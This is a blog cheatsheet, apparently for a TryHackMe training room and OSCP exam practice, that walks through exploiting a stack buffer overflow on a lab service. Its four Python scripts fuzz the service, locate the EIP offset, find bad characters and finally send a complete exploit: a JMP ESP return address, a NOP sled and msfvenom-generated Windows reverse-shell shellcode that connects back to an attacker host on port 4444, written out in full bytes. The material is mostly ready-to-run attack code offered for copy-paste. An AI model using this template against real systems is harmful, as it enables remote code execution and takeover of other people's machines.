Written by shakuganz

TryHackMe – Buffer Overflow Prep cheatsheet

Hi everyone!

This post is a compilation of John Hammond’s recent video on Buffer Overflow OSCP preparation from TryHackMe. You can see his video here:

Anyway, I will be using the OVERFLOW4 prefix instead. So watch his video if you haven’t. The cheatsheet below will allow you to quickly copy & paste, make some changes quickly especially during your OSCP exam.

Steps

  1. Fuzz for rough offsets that will overflow EIP/RET (fuzzing.py).
  2. Find specific offset to reach right before RET’s location (findoutset.py).
    • Use Metasploit’s pattern_create to generate pattern.
    • Use Metasploit’s pattern_offset to find out based on the content of overflowed EIP.
  3. Find bad chars which will affect our payload that is after the RET location (findbadchars.py)
    • \x00 is definitely a bad char. Different applications have different bad characters.
    • Send 0x01 to 0xFF as payload after the RET location. Then start analyzing the stack after RET location from 0x01 to 0xFF, see which char is missing and add to the badchar list variable then repeat the steps until you reach 0xFF.
  4. Find a JMP ESP instruction using mona and convert to little-endian if needed using struct.pack().
    1. Inside Immunity Debugger: !mona jmp -r esp -cpb"\x00<other bad chars>"
  5. Generate a reverse shellcode using MSFVenom that includes badchars flag.
  6. Send finaly exploit (BOF.py)
    • Good to include 32 bytes of NOP.

Fuzzing.py

Keep changing the offset’s value until you see the EIP in the Immunity debugger turns “41414141” which shows successful overflow.

#!/usr/bin/env python3

import socket

host, ip = "10.10.36.169", 1337  # change to the victim's IP and port

prefix = b'OVERFLOW4 '  # remove prefix if you do not need
offset = b'A' * 4000  # change 4000 to other values

# craft payload
payload = prefix + offset


with socket.socket() as s:
	s.connect((host, ip))
	s.send(payload)

Findoffset.py

Change the offset according to the offset value you have fuzzed. Remember to generate a new pattern via Metasploit’s pattern_create.rb.

#!/usr/bin/env python3

import socket

host, ip = "10.10.36.169", 1337

prefix = b'OVERFLOW4 '
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb --l 4000
offset = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F'

# craft payload
payload = prefix + offset


with socket.socket() as s:
	s.connect((host, ip))
	s.send(payload)

Findbadchars.py

Remember to change the offset value once you find out the offset via the EIP’s content through Metasploit’s pattern_offset.rb.

Starts with an empty list of the badchar variable and slowly look at the stack to identify what is the first bad char encountered, add into the bad char list then repeat by running the program and repeat the steps until you finished analyzing from 0x00 to 0xFF.

#!/usr/bin/env python3

import socket

host, ip = "10.10.36.169", 1337

allchar = bytearray(range(1,256))
badchar = [b'\xA9', b'\xCD', b'\xD4']  # start with empty list first

for char in badchar:
	allchar = allchar.replace(char, b'')


length = 4000           # change to the value you discovered at fuzzing.py
prefix = b'OVERFLOW4 '
offset = b'A' * 2026	# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570
RET = b'BBBB'
remaining = b'C' * (length - len(offset) - len(RET) - len(allchar))

# craft payload
payload = prefix + offset + RET + allchar + remaining


with socket.socket() as s:
	s.connect((host, ip))
	s.send(payload)

BOF.py

Remember to change the LHOST. Also, change the bad characters in the “-b” flag if you need to.

As for finding the “JMP ESP” address to use you can use either one of these in the Mona module:

  • !mona jmp -r esp -cpb “\x00”
  • !mona find -s ‘jmp esp’ -type instr -cm aslr=false,rebase=false,nx=false -cpb “\x00”

The second version of finding “JMP ESP” in the list will search global libraries to use while the first version only searches the current application and the libraries it will be using.

#!/usr/bin/env python3

import socket
import struct

# convert hexadecimal address to little-endian format
def p32(data):
	return struct.pack("<I", data)


host, ip = "10.10.36.169", 1337


length = 4000           # change to the value you discovered at fuzzing.py
prefix = b"OVERFLOW4 "
offset = b'A' * 2026	# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570
RET = p32(0x625011bb)	# !mona jmp -r esp -cpb "\x00\xA9\xCD\xD4"
NOP = b'\x90' * 32

# msfvenom -p windows/shell_reverse_tcp LHOST=10.4.39.1 LPORT=4444 EXITFUNC=thread  -f py -b "\x00\xA9\xCD\xD4"
buf =  b""
buf += b"\xb8\xc1\x3f\x75\x83\xdb\xdd\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x83\x31\x97"
buf += b"\x76\xff\xa6\xd5\x79\xff\x36\xba\xf0\x1a\x07\xfa\x67"
buf += b"\x6f\x38\xca\xec\x3d\xb5\xa1\xa1\xd5\x4e\xc7\x6d\xda"
buf += b"\xe7\x62\x48\xd5\xf8\xdf\xa8\x74\x7b\x22\xfd\x56\x42"
buf += b"\xed\xf0\x97\x83\x10\xf8\xc5\x5c\x5e\xaf\xf9\xe9\x2a"
buf += b"\x6c\x72\xa1\xbb\xf4\x67\x72\xbd\xd5\x36\x08\xe4\xf5"
buf += b"\xb9\xdd\x9c\xbf\xa1\x02\x98\x76\x5a\xf0\x56\x89\x8a"
buf += b"\xc8\x97\x26\xf3\xe4\x65\x36\x34\xc2\x95\x4d\x4c\x30"
buf += b"\x2b\x56\x8b\x4a\xf7\xd3\x0f\xec\x7c\x43\xeb\x0c\x50"
buf += b"\x12\x78\x02\x1d\x50\x26\x07\xa0\xb5\x5d\x33\x29\x38"
buf += b"\xb1\xb5\x69\x1f\x15\x9d\x2a\x3e\x0c\x7b\x9c\x3f\x4e"
buf += b"\x24\x41\x9a\x05\xc9\x96\x97\x44\x86\x5b\x9a\x76\x56"
buf += b"\xf4\xad\x05\x64\x5b\x06\x81\xc4\x14\x80\x56\x2a\x0f"
buf += b"\x74\xc8\xd5\xb0\x85\xc1\x11\xe4\xd5\x79\xb3\x85\xbd"
buf += b"\x79\x3c\x50\x11\x29\x92\x0b\xd2\x99\x52\xfc\xba\xf3"
buf += b"\x5c\x23\xda\xfc\xb6\x4c\x71\x07\x51\x79\x82\x20\x79"
buf += b"\x15\x88\x2e\x68\xba\x05\xc8\xe0\x52\x40\x43\x9d\xcb"
buf += b"\xc9\x1f\x3c\x13\xc4\x5a\x7e\x9f\xeb\x9b\x31\x68\x81"
buf += b"\x8f\xa6\x98\xdc\xed\x61\xa6\xca\x99\xee\x35\x91\x59"
buf += b"\x78\x26\x0e\x0e\x2d\x98\x47\xda\xc3\x83\xf1\xf8\x19"
buf += b"\x55\x39\xb8\xc5\xa6\xc4\x41\x8b\x93\xe2\x51\x55\x1b"
buf += b"\xaf\x05\x09\x4a\x79\xf3\xef\x24\xcb\xad\xb9\x9b\x85"
buf += b"\x39\x3f\xd0\x15\x3f\x40\x3d\xe0\xdf\xf1\xe8\xb5\xe0"
buf += b"\x3e\x7d\x32\x99\x22\x1d\xbd\x70\xe7\x3d\x5c\x50\x12"
buf += b"\xd6\xf9\x31\x9f\xbb\xf9\xec\xdc\xc5\x79\x04\x9d\x31"
buf += b"\x61\x6d\x98\x7e\x25\x9e\xd0\xef\xc0\xa0\x47\x0f\xc1"

remaining = b'C' * (length - len(offset) - len(RET) - len(NOP) - len(buf))

# craft payload
payload = prefix + offset + RET + NOP + buf + remaining


with socket.socket() as s:
	s.connect((host, ip))
	s.send(payload)

I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction and the cost of hosting the website as well as the domain name fee. The link is here. 🙂

Advertisement

Leave a Reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.